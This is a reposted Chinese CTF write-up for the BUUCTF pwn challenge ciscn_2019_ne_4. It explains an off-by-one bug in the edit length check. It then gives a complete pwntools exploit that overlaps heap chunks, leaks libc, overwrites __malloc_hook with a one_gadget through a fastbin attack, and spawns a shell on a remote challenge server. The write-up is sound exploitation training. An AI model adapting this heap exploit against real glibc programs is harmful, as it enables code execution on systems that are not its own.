其他分享
首页 > 其他分享> > [BUUCTF-pwn] ciscn_2019_ne_4

[BUUCTF-pwn] ciscn_2019_ne_4

作者:互联网

漏洞点:

在edit里,长度检查里如果长度比原长度大10则返回原长度+1 off_by_one

__int64 __fastcall sub_E3C(int a1, unsigned int a2)
{
  __int64 result; // rax

  if ( a1 > (int)a2 )
    return a2;
  if ( a2 - a1 == 10 )
    LODWORD(result) = a1 + 1;
  else
    LODWORD(result) = a1;
  return (unsigned int)result;
}

小难点:

  1. 用calloc建块,不使用tcache,所以tcache的不检查头也不能用,只能用错位写malloc_hook
  2. 写到malloc_hook就只能用one,但这里大多数都不能用,一直试到one[7],realloc+10调栈才成功

步骤:

  1. 建68+f8+68+f8*8 后7个删掉填满tcache再建7个0x68再删掉填tcache
  2. 利用2的off_by_one多的一位free1,3进行向前合并
  3. 再建f8,在2处得到libc
  4. 建68得到重叠块
  5. 建f8耗掉unsort
  6. free重叠块到fastbin再修改进行fastbinattack得到malloc_hook-0x23
  7. 写入one即可
from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
    one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
    libc_start_main_ret = 0x21a87
else:
    p = remote('node4.buuoj.cn', 26308) 
    libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
    one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
    libc_start_main_ret = 0x21b97

menu = b"CHOICE: "
def add(size):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"size: ", str(size).encode())

def edit(idx, fake_size, msg):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"index: ", str(idx).encode())
    p.sendlineafter(b"size: ", str(fake_size).encode())
    p.sendafter(b"content: ", msg)

def free(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"index: ", str(idx).encode())

def show(idx):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b"index: ", str(idx).encode())

#context.log_level = 'debug'

add(0x18)
add(0xf8) #1
add(0x68) #2
[add(0xf8) for i in range(8)]
add(0x18)
[free(i+4) for i in range(7)]
[add(0x68) for i in range(7)]
[free(i+4) for i in range(7)]

free(1)
edit(2, 0x68+10, b'A'*0x60+ p64(0x170)+b'\x00')
free(3)
add(0xf8) #1
show(2)

p.recvuntil(b"content: ")
malloc_hook = u64(p.recv(8)) - 0x60 -0x10
libc_base = malloc_hook - libc_elf.sym['__malloc_hook']
free_hook = libc_base + libc_elf.sym['__free_hook']
system    = libc_base + libc_elf.sym['system']
one_gadget= libc_base + one[7]
realloc   = libc_base + libc_elf.sym['realloc']
print('libc:', hex(libc_base))

add(0x68) #3
add(0xf8)
free(3)
edit(2, 0x8, p64(malloc_hook - 0x23))
add(0x68) #3
add(0x68) #5
edit(5, 27, b'\x00'*(3+8) + p64(one_gadget) + p64(realloc+10))

add(0x18)
#gdb.attach(p)
#pause()
p.sendline(b'cat /flag')
p.interactive()

标签:BUUCTF,libc,elf,free,hook,add,2019,sendlineafter,pwn
来源: https://blog.csdn.net/weixin_52640415/article/details/122046716